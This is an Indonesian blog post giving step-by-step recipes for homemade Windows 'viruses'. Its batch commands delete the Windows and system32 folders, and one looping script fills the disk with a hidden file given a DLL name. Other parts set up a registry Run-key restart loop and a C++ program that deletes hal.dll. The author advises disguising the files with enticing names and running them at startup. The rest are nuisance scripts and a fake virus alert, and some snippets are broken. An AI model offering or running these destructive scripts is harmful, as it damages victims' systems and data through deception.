Kamis, 07 Oktober 2010

Aneka virus notepad

MENGHAPUS WINDOWS

Sobatku sekalian!, sekarang kita mempelajari virus yang dapat menghapus system (kita mulai dari OS Windows aja ya!, nanti kalian kembangkan sendiri). Caranya : :evil:
1. buka aplikasi "Notepad",tau caranya khan?!

2. Tulis/Copy rumus dibawah ini!:

DEL /F /Q C:\WINDOWS (simple kan?)

3. sekarang simpan dalam format .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files",

klik "Save" deh!. Coba jalankan virus ini!, paling juga sekarang kalian harus nginstall ulang OS untuk komputer kalian. Hehe...

Wass. :-D very_funny
Note:
Artikel ini hanya sekedar tuk nambah wawasan qta. |police|
yoh manut :D ;) :) ;D >:( :( :o 8) ???

MEMBUAT KOMPUTER LEMOT


kali ini bukan ngehapus isi hd, tapi membuat file yg gedenya bisa segaban-gaban... ;D
ni contohnya:

:1
TYPE c:\windows\explorer.exe >> %SystemRoot%\system32\ddr3.dll
attrib +s +h %SystemRoot%\system32\ddr3.dll

goto 1


'c:\windows\explorer.exe' yg ini adalah file induk yg ditunggangi, dipilih explorer.exe karena file ini memakan resource memori yg gede...

'%SystemRoot%\system32\ddr3.dll' kalo yg ini adalah file hasil keluarannya, terserah mo ditaruh dimana dan dinamai apa... tapi usahakan diberi nama yg lazim jadi ga curiga kalo itu file bo'ongan :evil:

'attrib +s +h %SystemRoot%\system32\ddr3.dll' nah kalo yg ini buwat nyembunyiin file tersebut biar ga gampang diliat

'goto 1' buat looping script diatas nya...

kecepatan membesarnya file 'palsu' tersebut tergantung pada besarnya resource memory yg digunakan oleh file induk.. dan lamanya *.bat ini dijalankan..
nah kalo pengen si HD cepet penuh buat aja
:2 , :3 , dst... jangan lupa 'goto' juga dibanyakin :evil:
taruh deh di folder startup biar file *.bat ini dijalankan setiap kali booting...ato buat key registry baru di bagian 'Run'..

dijamin deh waktu ni file berjalan, komputer lu bakalan jadi lemot bget ;D ;D

semoga dapat dipergunakan dgn sebaik-baiknya.. thx


MEMBUAT KOMPUTER RESTART

kalo yg ini buat kompie jadi restart setiap kali booting...
1. buat script utama untuk restart

%SystemRoot%\system32\shutdown -r -f -t 00

'-r' untuk restart, kalau untuk shutdown ganti jadi -s
'-f' untuk memaksa menutup aplikasi yg sedang berjalan
'-t' untuk waktu, 00 berarti 0 detik
namai misalnya 'restart.bat'

2. buat file *.reg untuk nambah string di registry

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Restart"="%systemroot%\\restart.bat"

simpan dengan nama a.reg misalnya

3. buat file utama buat mengeksekusi 2 file diatas

copy /y restart.bat %systemroot%\restart.bat
regedit /s a.reg

'copy /y restart.bat %systemroot%\restart.bat ' yg ini buat meng-copy file restart.bat ke c:\windows
'regedit /s a.reg' yg ini nwt mengeksekusi file registry (a.reg) secara diam-diam (silent)..
simpan dengan nama yg menggoda.. :evil:
misalnya cewe seksi... :evil: :evil:

nah tinggal klik 2x aja pada file no.3 , efek baru akan keliatan kalo kompie di restart...

semoga bermanfaat ;D ;D

MEMBUKA CD-DRIVE TERUS MENERUS

Pertama2 Buka notepad,
copy kode script visual basic di bawah ini, lalu paste di notepad.

Set ilikepies = CreateObject(“WMPlayer.OCX.7″)
Set ilikepie = ilikepies.cdromCollection
if ilikepie.Count >=1 then
do
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ‘ cdrom
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ‘ cdrom
loop
End I
Kemudian save dengan ber-ekstension .vbs

MENGETIK TERUS MENERUS

Copy script berikut :

Set wshshell = wscript.CreateObject("WScript.Shell")

Wshshell.run "notepad"

do

wscript.sleep 400

wshshell.sendkeys "Hi, "

wscript.sleep 400

wshshell.sendkeys "My "

wscript.sleep 400

wshshell.sendkeys "Name "

wscript.sleep 200

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "aRvaNs "

wscript.sleep 400

wshshell.sendkeys "Site's "

wscript.sleep 400

wshshell.sendkeys "If "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 200

wshshell.sendkeys "don't "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "me "

wscript.sleep 400

wshshell.sendkeys "then "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "nobody "

wscript.sleep 200

wshshell.sendkeys "Common, "

wscript.sleep 400

wshshell.sendkeys "man "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "must "

wscript.sleep 400

wshshell.sendkeys "know me. "

wscript.sleep 400

wshshell.sendkeys "Hahahaha! "

wscript.sleep 400

wshshell.sendkeys "I "

wscript.sleep 200

wshshell.sendkeys "am "

wscript.sleep 400

wshshell.sendkeys "so "

wscript.sleep 400

wshshell.sendkeys "much "

wscript.sleep 400

wshshell.sendkeys "fun. "

wscript.sleep 400

wshshell.sendkeys "Well, "

wscript.sleep 400

wshshell.sendkeys "my "

wscript.sleep 400

wshshell.sendkeys "heart "

wscript.sleep 400

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "melting, "

wscript.sleep 400

wshshell.sendkeys "now "

wscript.sleep 400

wshshell.sendkeys "don't "

wscript.sleep 200

wshshell.sendkeys "cry !! "

wscript.sleep 400

wshshell.sendkeys "Please !! "

wscript.sleep 400

wshshell.sendkeys "Visit "

wscript.sleep 400

wshshell.sendkeys "http://www.arvanz.co.cc "

wscript.sleep 400

wshshell.sendkeys "Thx !! "

loop
Kemudian save dengan ber-ekstension .vbs
ENTER TERUS MENERUS
Copy script berikut :

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Kemudian save dengan ber-ekstension .vbs

LAMPU KEYBOARD BERKEDIP

Copy script berikut :
Set wshShell=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

Kemudian save dengan ber-ekstension .vbs



VIRUS ALERT ( pesan doang )
Copy script berikut :

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Kemudian save dengan ber-ekstension .vbs

KALKULATOR TERUS MENERUS
Copy script berikut :

@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top
Kemudian save dengan ber-ekstension .vbs




BACKSPACE
Copy script berikut :

MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Kemudian save dengan ber-ekstension .vbs


KEYBOARD
Copy script berikut :

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

Kemudian save dengan ber-ekstension .vbs


SHUTDOWN
Copy script berikut :

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0

Kemudian save dengan ber-ekstension .bat



Cara mematikan program diatas sbb :

1. buka task manager (ctrl+alt+del)
2. lalu cari wscript
3. matikan wscript dengan cara klik end process
4. dan akhirnya program notepad yang anda buat mati"

oke.. sekarang tinggal kamu coba aja !! :D




Virus yang kali ini cukup berbahaya, namun tidak merusak. Jika mau mencoba, silakan coba di komputer lain, jangan di komputer pribadi.

Langkah-langkah

1. Buka Notepad
2. Copy Code di bawah ini

Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" // menghapus system32
start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali // pesan
goto xxxx // eksekusi xxxx.bat



3. Save dengan nama xxx.bat (Jadikan all file, jangan .txt)
4. Buka Notepad (Notepad baru)
5. Copy kode berikut

Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz// pesan di message box
del // Delete files /// "del c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip



6. Save dengan nama xxxx.bat( Jadikan all file,,simpan di folder yg sama dengan file yang pertama)
7. Jika mau menjalankannya, jalankan yang xxxx.bat
8. Jika mau menjalankannya ketika komputer Startup Copy ke C:\Documents and Settings\*nama user*\Start Menu\Programs\Startup.

Virus Berbahaya hammerhammer

Virus yang ini mungkin dikategorikan berbahaya, dikarenakan bisa menghapus file .dll dan membuat komputer tak bisa booting. Jadi hati-hati, kalau mau coba, coba di komputer yang udah mau rusak aja pissspisss.

Langkah - langkah
1. Siapkan tool C++ (Seperti dev c Portable dan yang sejenis)
2. Copy Code di bawah ini

#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}



3. Program ini akan menghapus hal.dll , jadi jangan dieksekusi karena bisa menyebabkan gagal booting.
4. Kalau mau yang advance, copy code di bawah ini

#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}



5. Perbedaan dengan kode yang pertama adalah pada proses pencarian directory system secara sistem. (Kode pertama hanya bisa menghapus kode hal.dll jika dilteakkan di directory C: , sedangkan ini akan otomatis mencari.
6. Jangan coba di komputer yang masih normal-normal muanthabbb. Coba di komputer yang kira-kira sudah rusak berat saja pissspisss.

Tidak ada komentar:

Posting Komentar